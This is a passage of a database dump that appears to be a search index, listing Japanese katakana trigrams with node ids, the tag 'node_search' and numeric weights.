('ャリア', 157, 'ja', 'node_search', 0.923838),
('ャリア', 160, 'ja', 'node_search', 4),
('ャリア', 161, 'ja', 'node_search', 1),
('ャリア', 162, 'ja', 'node_search', 1.68961),
('ャリア', 163, 'ja', 'node_search', 1),
('ャリア', 164, 'ja', 'node_search', 1),
('ャリア', 165, 'ja', 'node_search', 1),
('ャリア', 166, 'ja', 'node_search', 0.848323),
('ャリア', 167, 'ja', 'node_search', 1),
('ャリア', 168, 'ja', 'node_search', 0.824901),
('ャリア', 169, 'ja', 'node_search', 1),
('ャリア', 170, 'ja', 'node_search', 0.808176),
('ャリア', 171, 'ja', 'node_search', 1),
('ャリア', 173, 'ja', 'node_search', 27.9769),
('ャリア', 174, 'ja', 'node_search', 1),
('ャリア', 175, 'ja', 'node_search', 1),
('ャリア', 176, 'ja', 'node_search', 1),
('ャリア', 177, 'ja', 'node_search', 1),
('ャリア', 178, 'ja', 'node_search', 1),
('ャリア', 180, 'ja', 'node_search', 0.976851),
('ャリア', 184, 'ja', 'node_search', 0.916736),
('ャリア', 185, 'ja', 'node_search', 1),
('ャリア', 186, 'ja', 'node_search', 1),
('ャリア', 187, 'ja', 'node_search', 1),
('ャリア', 189, 'ja', 'node_search', 0.800068),
('ャリア', 193, 'ja', 'node_search', 1),
('ャリア', 196, 'ja', 'node_search', 0.931053),
('ャリア', 198, 'ja', 'node_search', 1),
('ャレン', 62, 'ja', 'node_search', 0.585658),
('ャワデ', 27, 'ja', 'node_search', 0.367143),
('ャンス', 23, 'ja', 'node_search', 0.422007),
('ャンス', 24, 'ja', 'node_search', 0.499853),
('ャンス', 62, 'ja', 'node_search', 4),
('ャンス', 187, 'ja', 'node_search', 0.989021),
('ャンス', 194, 'ja', 'node_search', 1),
('ャンマ', 3, 'ja', 'node_search', 1),
('ャンマ', 23, 'ja', 'node_search', 1.15366),
('ャンマ', 24, 'ja', 'node_search', 1),
('ャンマ', 26, 'ja', 'node_search', 1),
('ャンマ', 87, 'ja', 'node_search', 0.62674),
('ャンマ', 126, 'ja', 'node_search', 1),
('ャンマ', 154, 'ja', 'node_search', 0.836446),
('ャンマ', 160, 'ja', 'node_search', 0.822065),
('ャンマ', 161, 'ja', 'node_search', 0.866793),
('ャンマ', 164, 'ja', 'node_search', 0.797402),
('ャンマ', 165, 'ja', 'node_search', 0.794753),
('ャンマ', 167, 'ja', 'node_search', 0.869951),
('ャンマ', 173, 'ja', 'node_search', 0.808176),
('ャンマ', 174, 'ja', 'node_search', 0.76431),
('ャンマ', 175, 'ja', 'node_search', 0.816452),
('ャンマ', 176, 'ja', 'node_search', 0.784336),
('ャンマ', 179, 'ja', 'node_search', 0.945829),
('ャーよ', 155, 'ja', 'node_search', 0.661163),
('ヤシェ', 23, 'ja', 'node_search', 0.738408),
('ヤダナ', 27, 'ja', 'node_search', 0.369897),
('ヤンゴ', 27, 'ja', 'node_search', 1),
('ヤンゴ', 95, 'ja', 'node_search', 19),
('ヤーシ', 27, 'ja', 'node_search', 5.07159),
('ヤーニ', 23, 'ja', 'node_search', 1),
('ヤーワ', 27, 'ja', 'node_search', 1.65755),
('ュニケ', 18, 'ja', 'node_search', 1),
('ュニケ', 24, 'ja', 'node_search', 0.414858),
('ュニテ', 10, 'ja', 'node_search', 1),
('ュラム', 142, 'ja', 'node_search', 0.653974),
('ューコ', 9, 'ja', 'node_search', 28),
('ューコ', 17, 'ja', 'node_search', 29),
('ューコ', 23, 'ja', 'node_search', 3.83461),
('ューコ', 24, 'ja', 'node_search', 1.46543),
('ューコ', 133, 'ja', 'node_search', 1.5666),
('ューコ', 135, 'ja', 'node_search', 2.41121),
('ューコ', 136, 'ja', 'node_search', 1.6916),
('ューコ', 138, 'ja', 'node_search', 2),
('ューコ', 154, 'ja', 'node_search', 1.84832),
('ューコ', 155, 'ja', 'node_search', 1),
('ューコ', 160, 'ja', 'node_search', 1.83938),
('ューコ', 161, 'ja', 'node_search', 1.8861),
('ューコ', 162, 'ja', 'node_search', 1.63167),
('ューコ', 163, 'ja', 'node_search', 1),
('ューコ', 164, 'ja', 'node_search', 1.81367),
('ューコ', 165, 'ja', 'node_search', 1.80545),
('ューコ', 166, 'ja', 'node_search', 1),
('ューコ', 167, 'ja', 'node_search', 1.88282),
('ューコ', 168, 'ja', 'node_search', 1),
('ューコ', 169, 'ja', 'node_search', 1),
('ューコ', 170, 'ja', 'node_search', 1),
('ューコ', 171, 'ja', 'node_search', 1),
('ューコ', 173, 'ja', 'node_search', 1.8249),
('ューコ', 174, 'ja', 'node_search', 1.77419),
('ューコ', 175, 'ja', 'node_search', 1.83353),
('ューコ', 176, 'ja', 'node_search', 1.80007),
('ューコ', 177, 'ja', 'node_search', 1),
('ューコ', 178, 'ja', 'node_search', 1),
('ューコ', 179, 'ja', 'node_search', 1.96109),
('ューコ', 180, 'ja', 'node_search', 1),
('ューコ', 181, 'ja', 'node_search', 1.7974),
('ューコ', 182, 'ja', 'node_search', 4.2327),
('ューコ', 183, 'ja', 'node_search', 3.98118),
('ューコ', 184, 'ja', 'node_search', 1),
('ューコ', 185, 'ja', 'node_search', 1),
('ューコ', 186, 'ja', 'node_search', 1.92027),
('ューコ', 187, 'ja', 'node_search', 1),
('ューコ', 188, 'ja', 'node_search', 1),
('ューコ', 189, 'ja', 'node_search', 1),
('ューコ', 190, 'ja', 'node_search', 1),
('ューコ', 191, 'ja', 'node_search', 1),
('ューコ', 192, 'ja', 'node_search', 1),
('ューコ', 193, 'ja', 'node_search', 1),
('ューコ', 194, 'ja', 'node_search', 1),
('ューコ', 195, 'ja', 'node_search', 1),
('ューコ', 196, 'ja', 'node_search', 1),
('ューコ', 197, 'ja', 'node_search', 1),
('ューコ', 198, 'ja', 'node_search', 1),
('ューコ', 199, 'ja', 'node_search', 1),
('ューコ', 200, 'ja', 'node_search', 1),
('ューシ', 27, 'ja', 'node_search', 0.42791),
('ュータ', 24, 'ja', 'node_search', 0.380763),
('ュータ', 30, 'ja', 'node_search', 1.84234),
('ュール', 62, 'ja', 'node_search', 1.19382),
('ョナル', 116, 'ja', 'node_search', 1),
('ョンが', 5, 'ja', 'node_search', 3),
('ョンで', 10, 'ja', 'node_search', 3),
('ョンで', 19, 'ja', 'node_search', 3),
('ョンで', 24, 'ja', 'node_search', 0.411376),
('ョンを', 27, 'ja', 'node_search', 0.426419),
('ョンを', 120, 'ja', 'node_search', 0.953396),
('ョンを', 142, 'ja', 'node_search', 0.961087),
('ョンコ', 30, 'ja', 'node_search', 1),
('ョン株', 27, 'ja', 'node_search', 20.1562),
('ョン能', 18, 'ja', 'node_search', 1),
('ライア', 25, 'ja', 'node_search', 2),
('ライア', 27, 'ja', 'node_search', 0.419117),
('ライク', 9, 'ja', 'node_search', 3),
('ライク', 17, 'ja', 'node_search', 4),
('ライト', 156, 'ja', 'node_search', 1),
('ライト', 157, 'ja', 'node_search', 1),
('ライ湾', 23, 'ja', 'node_search', 0.584241),
('ライ湾', 24, 'ja', 'node_search', 1),
('ラクシ', 27, 'ja', 'node_search', 24.7017),
('ラクス', 3, 'ja', 'node_search', 3),
('ラクタ', 135, 'ja', 'node_search', 1),
('ラクタ', 136, 'ja', 'node_search', 1),
('ラスが', 133, 'ja', 'node_search', 0.945829),
('ラスで', 133, 'ja', 'node_search', 1),
('ラスに', 3, 'ja', 'node_search', 43),
('ラスの', 62, 'ja', 'node_search', 31.5878),
('ラスの', 142, 'ja', 'node_search', 1),
('ラスは', 140, 'ja', 'node_search', 0.934703),
('ラスを', 24, 'ja', 'node_search', 0.362823),
('ラスを', 138, 'ja', 'node_search', 0.749958),
('ラスを', 155, 'ja', 'node_search', 1),
('ラス修', 138, 'ja', 'node_search', 1),
('ラス終', 133, 'ja', 'node_search', 19),
('ラス開', 155, 'ja', 'node_search', 27),
('ラック', 23, 'ja', 'node_search', 0.931053),
('ラック', 27, 'ja', 'node_search', 0.3256),
('ラミャ', 24, 'ja', 'node_search', 0.352466),
('ラムに', 179, 'ja', 'node_search', 1),
('ラムを', 142, 'ja', 'node_search', 0.652202),
('ランで', 77, 'ja', 'node_search', 4),
('ランで', 95, 'ja', 'node_search', 1),
('ランで', 122, 'ja', 'node_search', 19),
('ランで', 133, 'ja', 'node_search', 1),
('ランの', 135, 'ja', 'node_search', 1),
('ランの', 136, 'ja', 'node_search', 1),
('ランイ', 116, 'ja', 'node_search', 19),
('ランゲ', 155, 'ja', 'node_search', 1),
('ラン実', 98, 'ja', 'node_search', 19),
('ラン部', 135, 'ja', 'node_search', 0.774192),
('ラン面', 140, 'ja', 'node_search', 1),
('リアが', 166, 'ja', 'node_search', 0.845322),
('リアが', 189, 'ja', 'node_search', 0.797402),
('リアの', 154, 'ja', 'node_search', 1),
('リアの', 168, 'ja', 'node_search', 0.822065),
('リアの', 170, 'ja', 'node_search', 0.805455),
('リアへ', 160, 'ja', 'node_search', 4),
('リアへ', 161, 'ja', 'node_search', 1),
('リアへ', 173, 'ja', 'node_search', 27),
('リアへ', 180, 'ja', 'node_search', 0.972861),
('リアへ', 184, 'ja', 'node_search', 0.913226),
('リアへ', 186, 'ja', 'node_search', 1),
('リアへ', 196, 'ja', 'node_search', 0.927431),
('リアを', 156, 'ja', 'node_search', 1),
('リアを', 157, 'ja', 'node_search', 0.920273),
('リアを', 163, 'ja', 'node_search', 1),
('リアを', 164, 'ja', 'node_search', 1),
('リアを', 165, 'ja', 'node_search', 1),
('リアを', 167, 'ja', 'node_search', 1),
('リアを', 169, 'ja', 'node_search', 1),
('リアを', 171, 'ja', 'node_search', 1),
('リアを', 173, 'ja', 'node_search', 0.976851),
('リアを', 174, 'ja', 'node_search', 1),
('リアを', 175, 'ja', 'node_search', 1),
('リアを', 176, 'ja', 'node_search', 1),
('リアを', 177, 'ja', 'node_search', 1),
('リアを', 178, 'ja', 'node_search', 1),
('リアを', 187, 'ja', 'node_search', 1),
('リアデ', 27, 'ja', 'node_search', 0.379588),
('リア実', 193, 'ja', 'node_search', 1),
('リア実', 198, 'ja', 'node_search', 1),
('リア形', 162, 'ja', 'node_search', 1.68961),
('リア形', 185, 'ja', 'node_search', 1),
('リオを', 135, 'ja', 'node_search', 0.934703),
('リキュ', 142, 'ja', 'node_search', 0.657549),
('リゾー', 155, 'ja', 'node_search', 1),
('リティ', 155, 'ja', 'node_search', 0.736141),
('リュー', 27, 'ja', 'node_search', 0.42866),
('リング', 30, 'ja', 'node_search', 1.83549),
('リーに', 7, 'ja', 'node_search', 1.8861),
('リーに', 62, 'ja', 'node_search', 0.506102),
('リーを', 5, 'ja', 'node_search', 0.845322),
('リーダ', 120, 'ja', 'node_search', 1),
('リーデ', 25, 'ja', 'node_search', 1),
('ルで働', 18, 'ja', 'node_search', 3),
('ルで緊', 30, 'ja', 'node_search', 3),
('ルと関', 138, 'ja', 'node_search', 0.938382),
('ルの建', 5, 'ja', 'node_search', 3),
('ルの指', 116, 'ja', 'node_search', 1),
('ルの日', 163, 'ja', 'node_search', 0.722831),
('ルを持', 24, 'ja', 'node_search', 0.422007),
('ルを理', 3, 'ja', 'node_search', 0.536316),
('ルを磨', 116, 'ja', 'node_search', 1),
('ルを育', 135, 'ja', 'node_search', 0.863659),
('ルを身', 140, 'ja', 'node_search', 0.902857),
('ルスと', 27, 'ja', 'node_search', 5.16839),
('ルタン', 27, 'ja', 'node_search', 0.61241),
('ルダー', 27, 'ja', 'node_search', 0.394827),
('ルテス', 19, 'ja', 'node_search', 3),
('ルドル', 5, 'ja', 'node_search', 1),
('ルプレ', 135, 'ja', 'node_search', 0.968904),
('ルマ語', 3, 'ja', 'node_search', 0.512513),
('ルーチ', 142, 'ja', 'node_search', 0.683725),
('ループ', 23, 'ja', 'node_search', 1.75707),
('ループ', 27, 'ja', 'node_search', 1),
('ループ', 135, 'ja', 'node_search', 1),
('ループ', 138, 'ja', 'node_search', 1),
('ルール', 3, 'ja', 'node_search', 0.538701),
('ルーン', 27, 'ja', 'node_search', 0.329052),
('ル分野', 155, 'ja', 'node_search', 28),
('ル向上', 198, 'ja', 'node_search', 0.953396),
('ル特定', 155, 'ja', 'node_search', 5.75707),
('ル関係', 24, 'ja', 'node_search', 0.594307),
('レイン', 135, 'ja', 'node_search', 0.961087),
('レスな', 135, 'ja', 'node_search', 0.7017),
('レスト', 24, 'ja', 'node_search', 0.601716),
('レスト', 68, 'ja', 'node_search', 1),
('レスト', 70, 'ja', 'node_search', 1),
('レスト', 71, 'ja', 'node_search', 1),
('レスト', 72, 'ja', 'node_search', 1),
('レスト', 73, 'ja', 'node_search', 1),
('レスト', 74, 'ja', 'node_search', 1),
('レスト', 75, 'ja', 'node_search', 1),
('レスト', 77, 'ja', 'node_search', 4),
('レスト', 81, 'ja', 'node_search', 4),
('レスト', 82, 'ja', 'node_search', 1),
('レスト', 84, 'ja', 'node_search', 1),
('レスト', 90, 'ja', 'node_search', 1),
('レスト', 95, 'ja', 'node_search', 1),
('レスト', 98, 'ja', 'node_search', 19),
('レスト', 100, 'ja', 'node_search', 4),
('レスト', 104, 'ja', 'node_search', 7),
('レスト', 106, 'ja', 'node_search', 1),
('レスト', 107, 'ja', 'node_search', 1),
('レスト', 109, 'ja', 'node_search', 1),
('レスト', 110, 'ja', 'node_search', 1),
('レスト', 112, 'ja', 'node_search', 1),
('レスト', 114, 'ja', 'node_search', 1),
('レスト', 116, 'ja', 'node_search', 19),
('レスト', 117, 'ja', 'node_search', 1),
('レスト', 118, 'ja', 'node_search', 1),
('レスト', 119, 'ja', 'node_search', 1),
('レスト', 122, 'ja', 'node_search', 19),
('レスト', 123, 'ja', 'node_search', 1),
('レスト', 125, 'ja', 'node_search', 1),
('レスト', 131, 'ja', 'node_search', 1),
('レスト', 133, 'ja', 'node_search', 1),
('レスト', 135, 'ja', 'node_search', 1.77419),
('レスト', 136, 'ja', 'node_search', 1),
('レスト', 138, 'ja', 'node_search', 1),
('レスト', 140, 'ja', 'node_search', 1),
('レスト', 143, 'ja', 'node_search', 1),
('レスト', 144, 'ja', 'node_search', 1),
('レッジ', 10, 'ja', 'node_search', 1),
('レッジ', 18, 'ja', 'node_search', 3),
('レッス', 122, 'ja', 'node_search', 1),
('レッス', 142, 'ja', 'node_search', 1),
('レベル', 163, 'ja', 'node_search', 0.727213),
('レンジ', 62, 'ja', 'node_search', 0.584241),
('レンデ', 23, 'ja', 'node_search', 1.64521),
('レンデ', 24, 'ja', 'node_search', 1.46543),
('レーシ', 23, 'ja', 'node_search', 0.533952),
('レーシ', 24, 'ja', 'node_search', 0.577261),
('レーシ', 30, 'ja', 'node_search', 1),
('レーデ', 11, 'ja', 'node_search', 19),
('レーデ', 17, 'ja', 'node_search', 1),
('レーデ', 19, 'ja', 'node_search', 1),
('レーデ', 23, 'ja', 'node_search', 1.43709),
('レーデ', 27, 'ja', 'node_search', 1),
('レーデ', 154, 'ja', 'node_search', 1.84832),
('レーデ', 160, 'ja', 'node_search', 1.83938),
('レーデ', 161, 'ja', 'node_search', 1.8861),
('レーデ', 162, 'ja', 'node_search', 1.63167),
('レーデ', 163, 'ja', 'node_search', 1),
('レーデ', 164, 'ja', 'node_search', 1.81367),
('レーデ', 165, 'ja', 'node_search', 1.80545),
('レーデ', 166, 'ja', 'node_search', 1),
('レーデ', 167, 'ja', 'node_search', 1.88282),
('レーデ', 168, 'ja', 'node_search', 1),
('レーデ', 169, 'ja', 'node_search', 1),
('レーデ', 170, 'ja', 'node_search', 1),
('レーデ', 171, 'ja', 'node_search', 1),
('レーデ', 173, 'ja', 'node_search', 1.8249),
('レーデ', 174, 'ja', 'node_search', 1.77419),
('レーデ', 175, 'ja', 'node_search', 1.83353),
('レーデ', 176, 'ja', 'node_search', 1.80007),
('レーデ', 177, 'ja', 'node_search', 1),
('レーデ', 178, 'ja', 'node_search', 1),
('レーデ', 179, 'ja', 'node_search', 1.96109),
('レーデ', 180, 'ja', 'node_search', 1),
('レーデ', 184, 'ja', 'node_search', 1),
('レーデ', 185, 'ja', 'node_search', 1),
('レーデ', 186, 'ja', 'node_search', 1.92027),
('レーデ', 187, 'ja', 'node_search', 1),
('レーデ', 188, 'ja', 'node_search', 1),
('レーデ', 189, 'ja', 'node_search', 1),
('レーデ', 190, 'ja', 'node_search', 1),
('レーデ', 191, 'ja', 'node_search', 1),
('レーデ', 192, 'ja', 'node_search', 1),
('レーデ', 193, 'ja', 'node_search', 1),
('レーデ', 194, 'ja', 'node_search', 1),
('レーデ', 195, 'ja', 'node_search', 1),
('レーデ', 196, 'ja', 'node_search', 1),
('レーデ', 197, 'ja', 'node_search', 1),
('レーデ', 198, 'ja', 'node_search', 1),
('レーデ', 199, 'ja', 'node_search', 1),
('レーデ', 200, 'ja', 'node_search', 1),
('レーニ', 24, 'ja', 'node_search', 1.65669),
('レーニ', 62, 'ja', 'node_search', 0.731649),
('レーニ', 133, 'ja', 'node_search', 0.757065),
('レーニ', 136, 'ja', 'node_search', 1),
('レー地', 27, 'ja', 'node_search', 0.972861),
('レ工科', 27, 'ja', 'node_search', 0.354998),
('ログラ', 179, 'ja', 'node_search', 1),
('ロジェ', 27, 'ja', 'node_search', 3.5076),
('ロジェ', 30, 'ja', 'node_search', 1),
('ロフェ', 116, 'ja', 'node_search', 1),
('ローチ', 136, 'ja', 'node_search', 1),
('ローチ', 138, 'ja', 'node_search', 1),
('ロール', 135, 'ja', 'node_search', 0.976851),
('ローン', 3, 'ja', 'node_search', 0.98493),
('ワォン', 27, 'ja', 'node_search', 5.29478),
('ワディ', 27, 'ja', 'node_search', 2.02415),
('ワーク', 23, 'ja', 'node_search', 0.452478),
('ワーク', 24, 'ja', 'node_search', 1.2017),
('ワーク', 30, 'ja', 'node_search', 0.916736),
('ンが切', 5, 'ja', 'node_search', 3),
('ンでの', 122, 'ja', 'node_search', 19),
('ンでの', 135, 'ja', 'node_search', 0.989021),
('ンで働', 10, 'ja', 'node_search', 3),
('ンで働', 77, 'ja', 'node_search', 1),
('ンで優', 24, 'ja', 'node_search', 0.410687),
('ンで実', 95, 'ja', 'node_search', 1),
('ンで韓', 19, 'ja', 'node_search', 3),
('ンで食', 133, 'ja', 'node_search', 1),
('ンとい', 24, 'ja', 'node_search', 0.349476),
('ンのプ', 27, 'ja', 'node_search', 0.37784),
('ンの有', 95, 'ja', 'node_search', 1),
('ンの面', 135, 'ja', 'node_search', 1),
('ンの面', 136, 'ja', 'node_search', 1),
('ンを受', 3, 'ja', 'node_search', 0.976851),
('ンを守', 142, 'ja', 'node_search', 0.677939),
('ンを実', 142, 'ja', 'node_search', 1),
('ンを感', 120, 'ja', 'node_search', 0.949597),
('ンを提', 27, 'ja', 'node_search', 0.425677),
('ンを通', 142, 'ja', 'node_search', 0.957226),
('ンイン', 116, 'ja', 'node_search', 19),
('ンガポ', 5, 'ja', 'node_search', 29),
('ンガポ', 23, 'ja', 'node_search', 0.530446),
('ンガポ', 24, 'ja', 'node_search', 0.573154),
('ンガポ', 30, 'ja', 'node_search', 28),
('ングで', 24, 'ja', 'node_search', 0.53161),
('ングと', 133, 'ja', 'node_search', 0.749958),
('ングと', 138, 'ja', 'node_search', 19),
('ングな', 30, 'ja', 'node_search', 1.83136),
('ングの', 135, 'ja', 'node_search', 0.953396),
('ングを', 136, 'ja', 'node_search', 1),
('ングク', 24, 'ja', 'node_search', 0.363893),
('ングビ', 24, 'ja', 'node_search', 0.385536),
('ングビ', 62, 'ja', 'node_search', 0.725015),
('ング校', 24, 'ja', 'node_search', 0.372131),
('ング海', 23, 'ja', 'node_search', 2.0823),
('ング海', 24, 'ja', 'node_search', 1.46543),
('ンゲー', 155, 'ja', 'node_search', 1),
('ンコン', 27, 'ja', 'node_search', 5.29478),
('ンコー', 30, 'ja', 'node_search', 1),
('ンゴン', 27, 'ja', 'node_search', 1),
('ンゴン', 95, 'ja', 'node_search', 19),
('ンサポ', 30, 'ja', 'node_search', 0.886095),
('ンサル', 27, 'ja', 'node_search', 0.615536),
('ンシッ', 116, 'ja', 'node_search', 20),
('ンシッ', 122, 'ja', 'node_search', 2),
('ンシー', 11, 'ja', 'node_search', 19),
('ンシー', 17, 'ja', 'node_search', 1),
('ンシー', 19, 'ja', 'node_search', 1),
('ンシー', 23, 'ja', 'node_search', 2.0823),
('ンシー', 24, 'ja', 'node_search', 1.46543),
('ンシー', 27, 'ja', 'node_search', 1),
('ンシー', 135, 'ja', 'node_search', 2.41121),
('ンシー', 136, 'ja', 'node_search', 1.6916),
('ンシー', 138, 'ja', 'node_search', 1),
('ンシー', 154, 'ja', 'node_search', 1.84832),
('ンシー', 160, 'ja', 'node_search', 1.83938),
('ンシー', 161, 'ja', 'node_search', 1.8861),
('ンシー', 162, 'ja', 'node_search', 1.63167),
('ンシー', 163, 'ja', 'node_search', 1),
('ンシー', 164, 'ja', 'node_search', 1.81367),
('ンシー', 165, 'ja', 'node_search', 1.80545),
('ンシー', 166, 'ja', 'node_search', 1),
('ンシー', 167, 'ja', 'node_search', 1.88282),
('ンシー', 168, 'ja', 'node_search', 1),
('ンシー', 169, 'ja', 'node_search', 1),
('ンシー', 170, 'ja', 'node_search', 1),
('ンシー', 171, 'ja', 'node_search', 1),
('ンシー', 173, 'ja', 'node_search', 1.8249),
('ンシー', 174, 'ja', 'node_search', 1.77419),
('ンシー', 175, 'ja', 'node_search', 1.83353),
('ンシー', 176, 'ja', 'node_search', 1.80007),
('ンシー', 177, 'ja', 'node_search', 1),
('ンシー', 178, 'ja', 'node_search', 1),
('ンシー', 179, 'ja', 'node_search', 1.96109),
('ンシー', 180, 'ja', 'node_search', 1),
('ンシー', 184, 'ja', 'node_search', 1),
('ンシー', 185, 'ja', 'node_search', 1),
('ンシー', 186, 'ja', 'node_search', 1.92027),
('ンシー', 187, 'ja', 'node_search', 1),
('ンシー', 188, 'ja', 'node_search', 1),
('ンシー', 189, 'ja', 'node_search', 1),
('ンシー', 190, 'ja', 'node_search', 1),
('ンシー', 191, 'ja', 'node_search', 1),
('ンシー', 192, 'ja', 'node_search', 1),
('ンシー', 193, 'ja', 'node_search', 1),
('ンシー', 194, 'ja', 'node_search', 1),
('ンシー', 195, 'ja', 'node_search', 1),
('ンシー', 196, 'ja', 'node_search', 1),
('ンシー', 197, 'ja', 'node_search', 1),
('ンシー', 198, 'ja', 'node_search', 1),
('ンシー', 199, 'ja', 'node_search', 1),
('ンジニ', 10, 'ja', 'node_search', 32),
('ンジニ', 24, 'ja', 'node_search', 0.681785),
('ンジャ', 155, 'ja', 'node_search', 0.664818),
('ンスへ', 187, 'ja', 'node_search', 0.98493),
('ンスを', 23, 'ja', 'node_search', 0.421281),
('ンスを', 24, 'ja', 'node_search', 0.498827),
('ンスを', 62, 'ja', 'node_search', 4),
('ンスを', 194, 'ja', 'node_search', 1),
('ンスト', 27, 'ja', 'node_search', 24.7017),
('ンスト', 135, 'ja', 'node_search', 1),
('ンスト', 136, 'ja', 'node_search', 1),
('ンター', 62, 'ja', 'node_search', 1.27198),
('ンター', 116, 'ja', 'node_search', 20),
('ンター', 122, 'ja', 'node_search', 20),
('ンター', 142, 'ja', 'node_search', 19),
('ンター', 155, 'ja', 'node_search', 1),
('ンダレ', 27, 'ja', 'node_search', 1.35077),
('ンダー', 25, 'ja', 'node_search', 1),
('ンダー', 26, 'ja', 'node_search', 1),
('ンティ', 27, 'ja', 'node_search', 0.729424),
('ンテリ', 27, 'ja', 'node_search', 0.380763),
('ンディ', 23, 'ja', 'node_search', 1.64521),
('ンディ', 24, 'ja', 'node_search', 1.46543),
('ントか', 27, 'ja', 'node_search', 0.416977),
('ントと', 25, 'ja', 'node_search', 1),
('ントや', 25, 'ja', 'node_search', 1),
('ントを', 138, 'ja', 'node_search', 0.784336),
('ントレ', 24, 'ja', 'node_search', 0.537506),
('ンネー', 23, 'ja', 'node_search', 0.716357),
('ンビル', 27, 'ja', 'node_search', 0.3961),
('ンピュ', 24, 'ja', 'node_search', 0.381945),
('ンピュ', 30, 'ja', 'node_search', 1.84234),
('ンマラ', 9, 'ja', 'node_search', 3),
('ンマラ', 17, 'ja', 'node_search', 4),
('ンマラ', 23, 'ja', 'node_search', 0.587082),
('ンマラ', 24, 'ja', 'node_search', 1),
('ンマー', 3, 'ja', 'node_search', 1),
('ンマー', 23, 'ja', 'node_search', 1.15196),
('ンマー', 24, 'ja', 'node_search', 1),
('ンマー', 26, 'ja', 'node_search', 1),
('ンマー', 87, 'ja', 'node_search', 0.625114),
('ンマー', 126, 'ja', 'node_search', 1),
('ンマー', 154, 'ja', 'node_search', 0.833529),
('ンマー', 160, 'ja', 'node_search', 0.819249),
('ンマー', 161, 'ja', 'node_search', 0.863659),
('ンマー', 164, 'ja', 'node_search', 0.794753),
('ンマー', 165, 'ja', 'node_search', 0.792123),
('ンマー', 167, 'ja', 'node_search', 0.866793),
('ンマー', 173, 'ja', 'node_search', 0.805455),
('ンマー', 174, 'ja', 'node_search', 0.76188),
('ンマー', 175, 'ja', 'node_search', 0.813674),
('ンマー', 176, 'ja', 'node_search', 0.781775),
('ンマー', 179, 'ja', 'node_search', 0.942091),
('ン地方', 27, 'ja', 'node_search', 1.98493),
('ン大学', 27, 'ja', 'node_search', 1.14692),
('ン実習', 98, 'ja', 'node_search', 19),
('ン建築', 23, 'ja', 'node_search', 0.705825),
('ン株式', 27, 'ja', 'node_search', 20.1562),
('ン能力', 18, 'ja', 'node_search', 1),
('ン自動', 27, 'ja', 'node_search', 0.328182),
('ン部門', 135, 'ja', 'node_search', 0.771698),
('ン面接', 140, 'ja', 'node_search', 1),
('ヶ月か', 3, 'ja', 'node_search', 1),
('ーが日', 138, 'ja', 'node_search', 0.808176),
('ーした', 24, 'ja', 'node_search', 0.3961),
('ーする', 62, 'ja', 'node_search', 0.839384),
('ーでは', 23, 'ja', 'node_search', 0.643484),
('ーでは', 24, 'ja', 'node_search', 1),
('ーでは', 135, 'ja', 'node_search', 1),
('ーでは', 136, 'ja', 'node_search', 1),
('ーでは', 138, 'ja', 'node_search', 1),
('ーでは', 155, 'ja', 'node_search', 1),
('ーでは', 162, 'ja', 'node_search', 1),
('ーでは', 163, 'ja', 'node_search', 1),
('ーとな', 25, 'ja', 'node_search', 1),
('ーと経', 136, 'ja', 'node_search', 1),
('ーにつ', 155, 'ja', 'node_search', 0.98493),
('ーに分', 7, 'ja', 'node_search', 1.8861),
('ーに参', 62, 'ja', 'node_search', 0.50505),
('ーのた', 87, 'ja', 'node_search', 0.621888),
('ーのフ', 62, 'ja', 'node_search', 0.511433),
('ーの両', 136, 'ja', 'node_search', 1),
('ーの教', 136, 'ja', 'node_search', 0.742984),
('ーの現', 26, 'ja', 'node_search', 1),
('ーの若', 23, 'ja', 'node_search', 0.512513),
('ーの開', 142, 'ja', 'node_search', 19),
('ーは言', 62, 'ja', 'node_search', 0.754681),
('ーまで', 162, 'ja', 'node_search', 0.630018),
('ーより', 155, 'ja', 'node_search', 0.659351),
('ーをサ', 5, 'ja', 'node_search', 0.842342),
('ーを使', 30, 'ja', 'node_search', 1.84234),
('ーを信', 135, 'ja', 'node_search', 0.679856),
('ーを出', 126, 'ja', 'node_search', 1),
('ーを設', 23, 'ja', 'node_search', 1),
('ーウィ', 23, 'ja', 'node_search', 0.712106),
('ーカー', 136, 'ja', 'node_search', 1.74529),
('ーカー', 138, 'ja', 'node_search', 0.813674),
('ーキン', 138, 'ja', 'node_search', 19.9458),
('ークで', 24, 'ja', 'node_search', 0.506102),
('ークパ', 30, 'ja', 'node_search', 0.913226),
('ークビ', 23, 'ja', 'node_search', 0.45164),
('ークビ', 24, 'ja', 'node_search', 0.693594),
('ーコメ', 9, 'ja', 'node_search', 28),
('ーコメ', 17, 'ja', 'node_search', 29),
('ーコメ', 23, 'ja', 'node_search', 3.83461),
('ーコメ', 24, 'ja', 'node_search', 1.46543),
('ーコメ', 133, 'ja', 'node_search', 1.56366),
('ーコメ', 135, 'ja', 'node_search', 2.41121),
('ーコメ', 136, 'ja', 'node_search', 1.6916),
('ーコメ', 138, 'ja', 'node_search', 2),
('ーコメ', 154, 'ja', 'node_search', 1.84832),
('ーコメ', 155, 'ja', 'node_search', 1),
('ーコメ', 160, 'ja', 'node_search', 1.83938),
('ーコメ', 161, 'ja', 'node_search', 1.8861),
('ーコメ', 162, 'ja', 'node_search', 1.63167),
('ーコメ', 163, 'ja', 'node_search', 1),
('ーコメ', 164, 'ja', 'node_search', 1.81367),
('ーコメ', 165, 'ja', 'node_search', 1.80545),
('ーコメ', 166, 'ja', 'node_search', 1),
('ーコメ', 167, 'ja', 'node_search', 1.88282),
('ーコメ', 168, 'ja', 'node_search', 1),
('ーコメ', 169, 'ja', 'node_search', 1),
('ーコメ', 170, 'ja', 'node_search', 1),
('ーコメ', 171, 'ja', 'node_search', 1),
('ーコメ', 173, 'ja', 'node_search', 1.8249),
('ーコメ', 174, 'ja', 'node_search', 1.77419),
('ーコメ', 175, 'ja', 'node_search', 1.83353),
('ーコメ', 176, 'ja', 'node_search', 1.80007),
('ーコメ', 177, 'ja', 'node_search', 1),
('ーコメ', 178, 'ja', 'node_search', 1),
('ーコメ', 179, 'ja', 'node_search', 1.96109),
('ーコメ', 180, 'ja', 'node_search', 1),
('ーコメ', 181, 'ja', 'node_search', 1.7974),
('ーコメ', 182, 'ja', 'node_search', 4.2327),
('ーコメ', 183, 'ja', 'node_search', 3.98118),
('ーコメ', 184, 'ja', 'node_search', 1),
('ーコメ', 185, 'ja', 'node_search', 1),
('ーコメ', 186, 'ja', 'node_search', 1.92027),
('ーコメ', 187, 'ja', 'node_search', 1),
('ーコメ', 188, 'ja', 'node_search', 1),
('ーコメ', 189, 'ja', 'node_search', 1),
('ーコメ', 190, 'ja', 'node_search', 1),
('ーコメ', 191, 'ja', 'node_search', 1),
('ーコメ', 192, 'ja', 'node_search', 1),
